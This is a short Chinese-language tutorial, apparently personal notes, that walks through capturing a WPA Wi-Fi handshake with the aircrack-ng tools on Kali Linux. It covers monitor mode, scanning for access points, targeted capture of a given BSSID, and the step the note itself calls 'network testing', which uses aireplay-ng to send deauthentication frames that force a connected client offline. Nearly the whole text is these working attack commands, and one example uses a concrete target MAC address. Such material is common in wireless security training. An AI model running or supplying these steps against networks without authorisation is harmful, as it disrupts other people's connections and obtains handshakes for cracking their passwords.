查看无线网卡状态

iwconfig

清理干扰

airmon-ng check kill

开启监听（成功后，网卡接口名会变为 wlan0mon）

airmon-ng start wlan0

扫描周边 WiFi 接入点

airodump-ng wlan0mon

关键参数解析：
BSSID：目标路由器的 MAC 地址。
CH：信号所在的物理信道。
STATION：下方列表中连接该 WiFi 的设备 MAC（重点：必须有客户端在线才能抓包）。

定向抓包与数据保存

airodump-ng --channel [信道] --bssid [目标的BSSID] -w [文件名] wlan0mon
airodump-ng --channel 13 --bssid 10:04:C1:02:F8:7C  -w /home/kali/Desktop/wifi/ wlan0mon

发起网络测试（获取握手包的关键）

如果一直等不到客户端重连，我们需要主动出击。通过发送 反认证包 强制客户端掉线，在其自动重连的一瞬间抓取加密的握手信息。
保持抓包窗口运行，新开终端： -0 表示测试模式，5 表示发送包的数量

aireplay-ng -0 5 -a [路由器BSSID] -c [客户端MAC] wlan0mon

恢复网络环境

airmon-ng stop wlan0mon
systemctl restart NetworkManager